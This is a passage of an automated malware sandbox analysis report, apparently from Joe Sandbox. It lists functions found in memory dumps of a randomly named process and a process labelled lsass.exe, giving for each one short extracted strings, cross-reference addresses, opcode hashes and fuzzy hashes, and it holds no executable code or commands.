', xrefs: 00007FFA3623D52C
", xrefs: 00007FFA3623CBF4
", xrefs: 00007FFA3623CCB0
/, xrefs: 00007FFA3623CF2D
[, xrefs: 00007FFA3623D5B5

Memory Dump Source

Source File: 00000012.00000002.754426694.00007FFA36230000.00000040.00000001.sdmp, Offset: 00007FFA36230000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_18_2_7ffa36230000_wjIuhVBtfHXnMCZlWDoj.jbxd

Similarity

API ID:
String ID: "$"$'$-$/$[$}
API String ID: 0-631831671
Opcode ID: 70f2eb3eb07293bbd9d306acc476b0200c97c7b5a8acbf9f5d4c6b2ca276a820
Instruction ID: c9dc5a420fd0893a536c8f606c46b5ceae65b5699fab7c39b15af174b1024a97
Opcode Fuzzy Hash: 70f2eb3eb07293bbd9d306acc476b0200c97c7b5a8acbf9f5d4c6b2ca276a820
Instruction Fuzzy Hash: 8D81F670E142298FEB68DF55C894BFDB6B1AF55301F2190BAE44DA6390CF395A84EF40

Uniqueness

Uniqueness Score: -1.00%

Function 00007FFA3623A521, Relevance: 6.3, Strings: 5, Instructions: 90COMMON

Download Yara Rule

Strings

], xrefs: 00007FFA3623B8D9
H, xrefs: 00007FFA3623B871
E, xrefs: 00007FFA3623B90E
k, xrefs: 00007FFA3623B838
{, xrefs: 00007FFA3623A535

Memory Dump Source

Source File: 00000012.00000002.754426694.00007FFA36230000.00000040.00000001.sdmp, Offset: 00007FFA36230000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_18_2_7ffa36230000_wjIuhVBtfHXnMCZlWDoj.jbxd

Similarity

API ID:
String ID: E$H$]$k${
API String ID: 0-2038897844
Opcode ID: 769141677223d956ed16ca365f3f85d8cfbf45707186cc1395d7ffc653ba5fcf
Instruction ID: 75c8fb2314f18ec9fcc927e6ab1fe6617b59da1da6d8ff98638591a061ab42e6
Opcode Fuzzy Hash: 769141677223d956ed16ca365f3f85d8cfbf45707186cc1395d7ffc653ba5fcf
Instruction Fuzzy Hash: C1411770D0866A8FEB68DF54C894BEDB6B1BB55302F1181FAE00DA6781CB795AC4DF40

Uniqueness

Uniqueness Score: -1.00%

Function 00007FFA362384A5, Relevance: 6.3, Strings: 5, Instructions: 83COMMON

Download Yara Rule

Strings

^_^[, xrefs: 00007FFA36238579
^_^Y, xrefs: 00007FFA36238572
^_^E, xrefs: 00007FFA36238522
^_^G, xrefs: 00007FFA3623852A
*, xrefs: 00007FFA362384E9

Memory Dump Source

Source File: 00000012.00000002.754426694.00007FFA36230000.00000040.00000001.sdmp, Offset: 00007FFA36230000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_18_2_7ffa36230000_wjIuhVBtfHXnMCZlWDoj.jbxd

Similarity

API ID:
String ID: *$^_^E$^_^G$^_^Y$^_^[
API String ID: 0-3603620872
Opcode ID: 067dc5b872646290afb03e532c7c34efa9b0b1cd193774c8544638a4b7fb447e
Instruction ID: c3bae5b1d72f67f2d733b0e231f98a91db2e6c3edcebb8f2ae161a011871f9f6
Opcode Fuzzy Hash: 067dc5b872646290afb03e532c7c34efa9b0b1cd193774c8544638a4b7fb447e
Instruction Fuzzy Hash: D621C5739042195A96107B7EB8923DC3B91DF61B71B1041B2C6AC8A062DE293DCA8FD4

Uniqueness

Uniqueness Score: -1.00%

Function 00007FFA362384C8, Relevance: 6.3, Strings: 5, Instructions: 67COMMON

Download Yara Rule

Strings

^_^[, xrefs: 00007FFA36238579
^_^Y, xrefs: 00007FFA36238572
^_^E, xrefs: 00007FFA36238522
^_^G, xrefs: 00007FFA3623852A
*, xrefs: 00007FFA362384E9

Memory Dump Source

Source File: 00000012.00000002.754426694.00007FFA36230000.00000040.00000001.sdmp, Offset: 00007FFA36230000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_18_2_7ffa36230000_wjIuhVBtfHXnMCZlWDoj.jbxd

Similarity

API ID:
String ID: *$^_^E$^_^G$^_^Y$^_^[
API String ID: 0-3603620872
Opcode ID: 63333d05c5241f480ba48456545efa2b49ad2681c550d6972827e95cdb83dfca
Instruction ID: a9169f7967da4d9ab13a72096a0415baee868d3fe9b94dc63d9ebc1958ddd44f
Opcode Fuzzy Hash: 63333d05c5241f480ba48456545efa2b49ad2681c550d6972827e95cdb83dfca
Instruction Fuzzy Hash: 3011B6739142195AD7107F7EB8A33DC3B91DB61B71F1045B6CAAC8A062DE293CCA4E94

Uniqueness

Uniqueness Score: -1.00%

Function 00007FFA362384D0, Relevance: 6.3, Strings: 5, Instructions: 64COMMON

Download Yara Rule

Strings

^_^[, xrefs: 00007FFA36238579
^_^Y, xrefs: 00007FFA36238572
^_^E, xrefs: 00007FFA36238522
^_^G, xrefs: 00007FFA3623852A
*, xrefs: 00007FFA362384E9

Memory Dump Source

Source File: 00000012.00000002.754426694.00007FFA36230000.00000040.00000001.sdmp, Offset: 00007FFA36230000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_18_2_7ffa36230000_wjIuhVBtfHXnMCZlWDoj.jbxd

Similarity

API ID:
String ID: *$^_^E$^_^G$^_^Y$^_^[
API String ID: 0-3603620872
Opcode ID: 05497c9a5c7a7f00147928f13fad71773fa496e4dfe2d040bef8c86f3f72cfaf
Instruction ID: 066186f1ad47394291d3dc51590bd04b5233dbc7afd65c5735b46eeed4dd8a96
Opcode Fuzzy Hash: 05497c9a5c7a7f00147928f13fad71773fa496e4dfe2d040bef8c86f3f72cfaf
Instruction Fuzzy Hash: 6E11C8739142195A97107F7EB8A33DC3791DB61B71F1041B5CAAC8A062DE253CCA4E94

Uniqueness

Uniqueness Score: -1.00%

Analysis Process: lsass.exe PID: 1680 Parent PID: 3424 lsass.exeCOMMON

Executed Functions

Function 00007FFA3626ADAB, Relevance: 2.6, Strings: 2, Instructions: 76COMMON

Download Yara Rule

Strings

8, xrefs: 00007FFA3626ADB8
T\_H, xrefs: 00007FFA3626A3CF

Memory Dump Source

Source File: 00000014.00000002.940082537.00007FFA36260000.00000040.00000001.sdmp, Offset: 00007FFA36260000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_20_2_7ffa36260000_lsass.jbxd

Similarity

API ID:
String ID: 8$T\_H
API String ID: 0-155675327
Opcode ID: 56ad98473a0472010311235f483be76b3c36be42e9cd19a9312bf7a9674914ae
Instruction ID: e76943d94b8f2bdc34763a4e778782e9090acb64d13facd475fc96860149a604
Opcode Fuzzy Hash: 56ad98473a0472010311235f483be76b3c36be42e9cd19a9312bf7a9674914ae
Instruction Fuzzy Hash: D6312971E087198BEBA4DB6888557A8B7F1FB65300F4191FAD00DE3291DE756A80CF01

Uniqueness

Uniqueness Score: -1.00%

Function 00007FFA3626CDD4, Relevance: 2.5, Strings: 2, Instructions: 35COMMON

Download Yara Rule

Strings

/, xrefs: 00007FFA3626CF2D
, xrefs: 00007FFA3626CE23

Memory Dump Source

Source File: 00000014.00000002.940082537.00007FFA36260000.00000040.00000001.sdmp, Offset: 00007FFA36260000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_20_2_7ffa36260000_lsass.jbxd

Similarity

API ID:
String ID: $/
API String ID: 0-2637513485
Opcode ID: 11748e93af306a3c4fe239b5ad61bd1d6c9155711847f689bccb2b9a3dacc7bb
Instruction ID: 1d6063dcdc1e210d35458400e4e24bb52e4d75a11873e79b37afbcc4dbfa6fa5
Opcode Fuzzy Hash: 11748e93af306a3c4fe239b5ad61bd1d6c9155711847f689bccb2b9a3dacc7bb
Instruction Fuzzy Hash: 3B019674E0861D8FEBA4EB48C894AE8B7B1FB69300F1041AAD40DD7391CE746980DF40

Uniqueness

Uniqueness Score: -1.00%

Function 00007FFA36270FA4, Relevance: 2.2, Strings: 1, Instructions: 966COMMON

Download Yara Rule

Strings

#S}, xrefs: 00007FFA3627128D

Memory Dump Source

Source File: 00000014.00000002.940082537.00007FFA36260000.00000040.00000001.sdmp, Offset: 00007FFA36260000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_20_2_7ffa36260000_lsass.jbxd

Similarity

API ID:
String ID: #S}
API String ID: 0-2721051066
Opcode ID: 98dfff3c55ee4dde94086541f5aea21899735a0f6cc657e17694943c41c36d4f
Instruction ID: c5a4a87cbbc5567c0906b4cabf18b43dff801cb1231192fca9f4cfcc8d48d9a5
Opcode Fuzzy Hash: 98dfff3c55ee4dde94086541f5aea21899735a0f6cc657e17694943c41c36d4f
Instruction Fuzzy Hash: BF82C770D1861D8FEBA4EB58C899FA8B7B1FF69300F5591A9D00DD7292CE35A980DF01

Uniqueness

Uniqueness Score: -1.00%

Function 00007FFA36268338, Relevance: 1.4, Strings: 1, Instructions: 171COMMON

Download Yara Rule

Strings

n_H, xrefs: 00007FFA36268C03

Memory Dump Source

Source File: 00000014.00000002.940082537.00007FFA36260000.00000040.00000001.sdmp, Offset: 00007FFA36260000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_20_2_7ffa36260000_lsass.jbxd

Similarity

API ID:
String ID: n_H
API String ID: 0-741502821
Opcode ID: b6d663921da7f8b19a8e1643a9927414282c1de531c009c3547f416cffab3185
Instruction ID: fb4acf06f9ec7adce5937e18a696bd3815ba46029c1f315508b75258d2ae99bb
Opcode Fuzzy Hash: b6d663921da7f8b19a8e1643a9927414282c1de531c009c3547f416cffab3185
Instruction Fuzzy Hash: 8E5109B0D0861D8FEB94EB98C455AFDB7B1EF69300F51913AD40EE3381DE7968419B50

Uniqueness

Uniqueness Score: -1.00%

Function 00007FFA36268B2C, Relevance: 1.4, Strings: 1, Instructions: 119COMMON

Download Yara Rule

Strings

n_H, xrefs: 00007FFA36268C03

Memory Dump Source

Source File: 00000014.00000002.940082537.00007FFA36260000.00000040.00000001.sdmp, Offset: 00007FFA36260000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_20_2_7ffa36260000_lsass.jbxd

Similarity

API ID:
String ID: n_H
API String ID: 0-741502821
Opcode ID: dd56e5d2097d11adea895ca8b242e88e7d820d08f3f125fd2d52175fd943256a
Instruction ID: 9a7f7868c16c95c954946d951493396dd433b75c0328f98ab3425cc6c237ef1f
Opcode Fuzzy Hash: dd56e5d2097d11adea895ca8b242e88e7d820d08f3f125fd2d52175fd943256a
Instruction Fuzzy Hash: 3531F770D18A1D8EEBD4EB98D895AFCB7B1FF69300F51513AD40DE3282DE7968419B40

Uniqueness

Uniqueness Score: -1.00%

Function 00007FFA36273600, Relevance: 1.3, Strings: 1, Instructions: 90COMMON

Download Yara Rule

Strings

$'6, xrefs: 00007FFA36273614

Memory Dump Source

Source File: 00000014.00000002.940082537.00007FFA36260000.00000040.00000001.sdmp, Offset: 00007FFA36260000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_20_2_7ffa36260000_lsass.jbxd

Similarity

API ID:
String ID: $'6
API String ID: 0-23382198
Opcode ID: 00bbd404ce21854b06c698f32819a9825f103dfc9c7f25d821f99876b76542dc
Instruction ID: 677d760637c827fcc4d4e59dde9a259e5288cc40778d28d4c27f3b91c5f423ee
Opcode Fuzzy Hash: 00bbd404ce21854b06c698f32819a9825f103dfc9c7f25d821f99876b76542dc
Instruction Fuzzy Hash: 5F31AFF1D0960A4EFB48DB98945ADFE7BF0EF59310F11513ED009A3382CE2959019B54

Uniqueness

Uniqueness Score: -1.00%

Function 00007FFA36269820, Relevance: .4, Instructions: 361COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000014.00000002.940082537.00007FFA36260000.00000040.00000001.sdmp, Offset: 00007FFA36260000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_20_2_7ffa36260000_lsass.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 41473d57c4ca54402a9e0e0c8729ffb418a8f897ec2ec977028833825fd0d884
Instruction ID: bbfa439a2e8308799b0238621f96a95c28b2bfb26925c83f4e58bc08b2d95eed
Opcode Fuzzy Hash: 41473d57c4ca54402a9e0e0c8729ffb418a8f897ec2ec977028833825fd0d884
Instruction Fuzzy Hash: 5FD14E70D1865A8FEB98DB98C855BB8BBF1FF69700F1480B9D00EE7292CE756845DB40

Uniqueness

Uniqueness Score: -1.00%

Function 00007FFA36269801, Relevance: .3, Instructions: 304COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000014.00000002.940082537.00007FFA36260000.00000040.00000001.sdmp, Offset: 00007FFA36260000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_20_2_7ffa36260000_lsass.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: aa273aaf833003a74aaaf37c45607fc86cd50eba27753c8c82125a252522839b
Instruction ID: 484db98049da63ba8cacdb9e80c1720f89a726aea0144bf5db803d0f296d983f
Opcode Fuzzy Hash: aa273aaf833003a74aaaf37c45607fc86cd50eba27753c8c82125a252522839b
Instruction Fuzzy Hash: A8B15071D1865A8FEBA8DB98C855BB8BBF1FF69300F1480B9D00DD7292CE756884DB40

Uniqueness

Uniqueness Score: -1.00%

Function 00007FFA36270CCE, Relevance: .3, Instructions: 260COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000014.00000002.940082537.00007FFA36260000.00000040.00000001.sdmp, Offset: 00007FFA36260000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_20_2_7ffa36260000_lsass.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 533c71d79a1fb522cca802c5e095185b97edb646016806135130b112a76496df
Instruction ID: a7db651c38426201b90aacc1ae08c1e25fe177d858622741bfb26844a6a4745d
Opcode Fuzzy Hash: 533c71d79a1fb522cca802c5e095185b97edb646016806135130b112a76496df
Instruction Fuzzy Hash: 08A1A370D0891D8FDBA4EB58C894BE9B7B1FF69300F5081A9D00DE7292CE75AA85DF40

Uniqueness

Uniqueness Score: -1.00%

Function 00007FFA362747E1, Relevance: .2, Instructions: 247COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000014.00000002.940082537.00007FFA36260000.00000040.00000001.sdmp, Offset: 00007FFA36260000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_20_2_7ffa36260000_lsass.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 5ec7d63045ed736d6f22f97c75b8910a0774720e1c380e935c471e56a8e92336
Instruction ID: d81c20741c515164a426ad35584dc9f63934e7be42c3dca7ff3ba1ec2ef22a19
Opcode Fuzzy Hash: 5ec7d63045ed736d6f22f97c75b8910a0774720e1c380e935c471e56a8e92336
Instruction Fuzzy Hash: 407126B0D0C58E8FE7A8DB48C841DF437D1FF5A311B169275D49DC76A3CE26A8029790

Uniqueness

Uniqueness Score: -1.00%

Function 00007FFA36272D07, Relevance: .2, Instructions: 233COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000014.00000002.940082537.00007FFA36260000.00000040.00000001.sdmp, Offset: 00007FFA36260000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_20_2_7ffa36260000_lsass.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: e2a70c7013ae1a7f9da01b5a95eb0441f4995c3fb7a983eb1b96bc952fbad144
Instruction ID: 9dc2568b279eb4c199c6cd72c05b541a81f89fd44647a0565e50cefb7626b6ea
Opcode Fuzzy Hash: e2a70c7013ae1a7f9da01b5a95eb0441f4995c3fb7a983eb1b96bc952fbad144
Instruction Fuzzy Hash: 93513B77E091295FE6207BBDF8C28F87750DF92771B119133D18C8D1AB8E2534899EA8

Uniqueness

Uniqueness Score: -1.00%

Function 00007FFA36272D20, Relevance: .2, Instructions: 223COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000014.00000002.940082537.00007FFA36260000.00000040.00000001.sdmp, Offset: 00007FFA36260000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_20_2_7ffa36260000_lsass.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 7df7dde178a3b49aca59721dd360d0ca6eed6d98e15a5ed7028e92403e866175
Instruction ID: b7e9cc34018a2cdf9232be58d27cb32f9377a170c0d14a53062d8d0a2f7338c4
Opcode Fuzzy Hash: 7df7dde178a3b49aca59721dd360d0ca6eed6d98e15a5ed7028e92403e866175
Instruction Fuzzy Hash: 4D512B77E091295FE6207BBDF8C28F87B50DF92771B119133D14C8D1AB8E2534899EA8

Uniqueness

Uniqueness Score: -1.00%

Function 00007FFA36270719, Relevance: .2, Instructions: 201COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000014.00000002.940082537.00007FFA36260000.00000040.00000001.sdmp, Offset: 00007FFA36260000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_20_2_7ffa36260000_lsass.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 54e0f226c6140c1c0f1529f38bfaca09cb2421837c6c038d51d2567ab889ed31
Instruction ID: 3452b21d29d9c88562e466beec9ae6ed75f5d1177f81b08c737a0ee45a5f3c6a
Opcode Fuzzy Hash: 54e0f226c6140c1c0f1529f38bfaca09cb2421837c6c038d51d2567ab889ed31
Instruction Fuzzy Hash: 5E6150B0D08A1D8FEBA4EB588855BE8B7B1FF66300F1191B9D00DE3292DE759D85DB40

Uniqueness

Uniqueness Score: -1.00%

Function 00007FFA36272D88, Relevance: .2, Instructions: 180COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000014.00000002.940082537.00007FFA36260000.00000040.00000001.sdmp, Offset: 00007FFA36260000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_20_2_7ffa36260000_lsass.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 10d49e170b1c61bef9aad7591a8fb9175e1821ba09be0972ab14be7886de77d1
Instruction ID: f75220c4668b2b42be9ae0eef9f434cc7bfb86ae78672a4296c9a10358d34096
Opcode Fuzzy Hash: 10d49e170b1c61bef9aad7591a8fb9175e1821ba09be0972ab14be7886de77d1
Instruction Fuzzy Hash: C241FC73D091295BF6207BADB8828FC7B40DF92B71B219137D54C891B78E1934895AA8

Uniqueness

Uniqueness Score: -1.00%

Function 00007FFA3626E519, Relevance: .2, Instructions: 174COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000014.00000002.940082537.00007FFA36260000.00000040.00000001.sdmp, Offset: 00007FFA36260000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_20_2_7ffa36260000_lsass.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 54f196ef20363988c4d8cec7bb280f6b19b5a14c529c2c365867dd156548b2ae
Instruction ID: 976f4ad73b9a12b19819216fa629138280a4d2efccd59aba960145e1be844098
Opcode Fuzzy Hash: 54f196ef20363988c4d8cec7bb280f6b19b5a14c529c2c365867dd156548b2ae
Instruction Fuzzy Hash: 4A611A70D1861D8FEB90EBA8C855AECBBB1FF69300F50817AD04DE3292DE7568859B40

Uniqueness

Uniqueness Score: -1.00%

Function 00007FFA36272DA8, Relevance: .2, Instructions: 166COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000014.00000002.940082537.00007FFA36260000.00000040.00000001.sdmp, Offset: 00007FFA36260000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_20_2_7ffa36260000_lsass.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: f4674654a2440cdce1202348524ac19d9b95620ccd735d825aa7c7a2663caa4e
Instruction ID: 690342c4855eabae31b5510cf3186a444524ea2c6b429afd3f4a4c053e30b813
Opcode Fuzzy Hash: f4674654a2440cdce1202348524ac19d9b95620ccd735d825aa7c7a2663caa4e
Instruction Fuzzy Hash: 72411D73D091295BFA247BADBC828FC7B40DF92B71B219133D54C491BB8E1934895AA8

Uniqueness

Uniqueness Score: -1.00%

Function 00007FFA36272DD0, Relevance: .1, Instructions: 148COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000014.00000002.940082537.00007FFA36260000.00000040.00000001.sdmp, Offset: 00007FFA36260000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_20_2_7ffa36260000_lsass.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: e998d058af47c67418961a2b6ac0f0843d0a5609a0d043a8ae70d78dbf8c19ca
Instruction ID: 1ae160cdecfa89719d8cc15eadb180f03ecd2bf05f7d5335df4a5afe23742bca
Opcode Fuzzy Hash: e998d058af47c67418961a2b6ac0f0843d0a5609a0d043a8ae70d78dbf8c19ca
Instruction Fuzzy Hash: 43410B73D0D12A5BFA347BADBC82CFC6B40DF92771B219133D50C491BB4E1934895AA8

Uniqueness

Uniqueness Score: -1.00%

Function 00007FFA36273E64, Relevance: .1, Instructions: 137COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000014.00000002.940082537.00007FFA36260000.00000040.00000001.sdmp, Offset: 00007FFA36260000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_20_2_7ffa36260000_lsass.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 5a9467260526ad34dce9a250039f4636aea69de1b98e4519246d947072980fc7
Instruction ID: 1e85536622402678352d52a6d68c91db86338b6806b4e49c7d4f14aff0ccca40
Opcode Fuzzy Hash: 5a9467260526ad34dce9a250039f4636aea69de1b98e4519246d947072980fc7
Instruction Fuzzy Hash: 3941ACB1D0C68E8FEB55CBA48861DFD7BB0EF56310F1580BAD04ED7292CE2A6802D711

Uniqueness

Uniqueness Score: -1.00%

Function 00007FFA36272DE8, Relevance: .1, Instructions: 136COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000014.00000002.940082537.00007FFA36260000.00000040.00000001.sdmp, Offset: 00007FFA36260000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_20_2_7ffa36260000_lsass.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 84e7698842709dbe50ebc3b81682fc4ca9cb8944bcf82e17a6976a88ac6492b1
Instruction ID: 9b345c3a74cd9ecbe5f3f7a8751e45df75dcee45c8430c11b0b99c2a8626f2c5
Opcode Fuzzy Hash: 84e7698842709dbe50ebc3b81682fc4ca9cb8944bcf82e17a6976a88ac6492b1
Instruction Fuzzy Hash: 9031FA73D0912A5BFA347BEDB882CFD6B44DF92771F219133D40C491BB4E1934899AA8

Uniqueness

Uniqueness Score: -1.00%

Function 00007FFA36260F39, Relevance: .1, Instructions: 122COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000014.00000002.940082537.00007FFA36260000.00000040.00000001.sdmp, Offset: 00007FFA36260000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_20_2_7ffa36260000_lsass.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: bc955e29a0cfb256b3de031775a393589bfe429277dd0a64a937e0d1174dfc27
Instruction ID: ca03ba94d7e2059201a250a8e60e201b2f68e1e69364714026095c5533e7ba2c
Opcode Fuzzy Hash: bc955e29a0cfb256b3de031775a393589bfe429277dd0a64a937e0d1174dfc27
Instruction Fuzzy Hash: EC416D31D086498FEB90DB98C558AFC7BF0EF26300F51517AC40DE7292CFBA6954AB40

Uniqueness

Uniqueness Score: -1.00%

Function 00007FFA3626D67D, Relevance: .1, Instructions: 118COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000014.00000002.940082537.00007FFA36260000.00000040.00000001.sdmp, Offset: 00007FFA36260000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_20_2_7ffa36260000_lsass.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: cf3d97e9f98070cff3426a6edd735c76a798d96283401a178bc8785822067db2
Instruction ID: ce88b5da31023deb2ed6ecfdaf7faa41333538925c2f015ec47e6f9672ed9f1f
Opcode Fuzzy Hash: cf3d97e9f98070cff3426a6edd735c76a798d96283401a178bc8785822067db2
Instruction Fuzzy Hash: 0441AB7180E7C54FD7438B748C251917FB0AF17214B1E45EBD4C8CF1A3E6295A89C762

Uniqueness

Uniqueness Score: -1.00%

Function 00007FFA36272E10, Relevance: .1, Instructions: 109COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000014.00000002.940082537.00007FFA36260000.00000040.00000001.sdmp, Offset: 00007FFA36260000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_20_2_7ffa36260000_lsass.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: c988156a6581990b21934887dc5d7ac511c567c1482ce6a8c840b2193fdc243f
Instruction ID: 2b04bd3526eec7c8320973b585a2a8d7719ec6d9c0b3c5989c86ae94b2c31f74
Opcode Fuzzy Hash: c988156a6581990b21934887dc5d7ac511c567c1482ce6a8c840b2193fdc243f
Instruction Fuzzy Hash: 8F31D873D0911A5BFA247BEDB882CFD6B41DF92771F21D136D00C451AB4E193484AAA8

Uniqueness

Uniqueness Score: -1.00%

Function 00007FFA36268648, Relevance: .1, Instructions: 107COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000014.00000002.940082537.00007FFA36260000.00000040.00000001.sdmp, Offset: 00007FFA36260000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_20_2_7ffa36260000_lsass.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 74053e60fadec65b2bc1cafd15c0c5bee268d06eb675d02ba36703222415e00b
Instruction ID: 91f41ac598691e01a871fb639c3f3175f288417e1b68634ff324fd9d189d5d04
Opcode Fuzzy Hash: 74053e60fadec65b2bc1cafd15c0c5bee268d06eb675d02ba36703222415e00b
Instruction Fuzzy Hash: 26417BB0D1920A9EFB54EB94C444FFDBAF1AF16300F119179D40EA7286DE3D2A44EB51

Uniqueness

Uniqueness Score: -1.00%

Function 00007FFA36260669, Relevance: .1, Instructions: 104COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000014.00000002.940082537.00007FFA36260000.00000040.00000001.sdmp, Offset: 00007FFA36260000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_20_2_7ffa36260000_lsass.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 8c4d45bcc72ae439b5f8825687742f743fc25557e0261e650594617827eeea53
Instruction ID: 6c86a8567aae61ef58efcee0b93e19af9a16edd698e944c67b9dee13d11d924d
Opcode Fuzzy Hash: 8c4d45bcc72ae439b5f8825687742f743fc25557e0261e650594617827eeea53
Instruction Fuzzy Hash: D631B131D0C68D8FF7A59BA888596B87FA0EF67300F0594B6D40DC7292DF695894D701

Uniqueness

Uniqueness Score: -1.00%

Function 00007FFA36270B09, Relevance: .1, Instructions: 100COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000014.00000002.940082537.00007FFA36260000.00000040.00000001.sdmp, Offset: 00007FFA36260000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_20_2_7ffa36260000_lsass.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 0e5a41cc1e7cb8c7b0be466ed72c989bf6119a672fefdfb9c89d897d267545a2
Instruction ID: fcd9a99ea84242d7c0a138cfb8b75da010fd8375d2538282e6cac61543edd5dd
Opcode Fuzzy Hash: 0e5a41cc1e7cb8c7b0be466ed72c989bf6119a672fefdfb9c89d897d267545a2
Instruction Fuzzy Hash: 5C3141B1D09A1E8EFBA4DB889845FE973B0FB15305F51A1B6D00DD3242DE35BA499F40

Uniqueness

Uniqueness Score: -1.00%

Function 00007FFA36272F19, Relevance: .1, Instructions: 99COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000014.00000002.940082537.00007FFA36260000.00000040.00000001.sdmp, Offset: 00007FFA36260000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_20_2_7ffa36260000_lsass.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 5ba892ce4887b8bb95d36b93e4b6da1c06f9db85e95c6e79928ee9169b9090b3
Instruction ID: 87579bc9dcee2ac872f624c9716c51ab1a46afd2e552449077f5603130c7afb1
Opcode Fuzzy Hash: 5ba892ce4887b8bb95d36b93e4b6da1c06f9db85e95c6e79928ee9169b9090b3
Instruction Fuzzy Hash: 23315571D0964D8FEB95EFA8D854AEDBBB0FF5A300F01417AD40DE3292CA399841DB41

Uniqueness

Uniqueness Score: -1.00%

Function 00007FFA36273768, Relevance: .1, Instructions: 98COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000014.00000002.940082537.00007FFA36260000.00000040.00000001.sdmp, Offset: 00007FFA36260000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_20_2_7ffa36260000_lsass.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: a5bd3f2605bc66e66c347005e4b6bc369a31d395cfdb5accbe05b9370aee4072
Instruction ID: 730ef6592c8c835a20213370aca3f37256211a2a492eb9fc122fbcf20dc211c2
Opcode Fuzzy Hash: a5bd3f2605bc66e66c347005e4b6bc369a31d395cfdb5accbe05b9370aee4072
Instruction Fuzzy Hash: B131AFB1D0C38A8FE7129BA08865DE97BB1EF57310F0681BAC049DB2D3DE6C6846D751

Uniqueness

Uniqueness Score: -1.00%

Function 00007FFA36272E28, Relevance: .1, Instructions: 97COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000014.00000002.940082537.00007FFA36260000.00000040.00000001.sdmp, Offset: 00007FFA36260000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_20_2_7ffa36260000_lsass.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 9f2827375cd1011c78ed82767b6da63d17282b397ea96e758275da9a2e3c9193
Instruction ID: 7f68e377e9755f0412127faa2046cf18c7a1b3e262cb32af43c5e7d143c556d8
Opcode Fuzzy Hash: 9f2827375cd1011c78ed82767b6da63d17282b397ea96e758275da9a2e3c9193
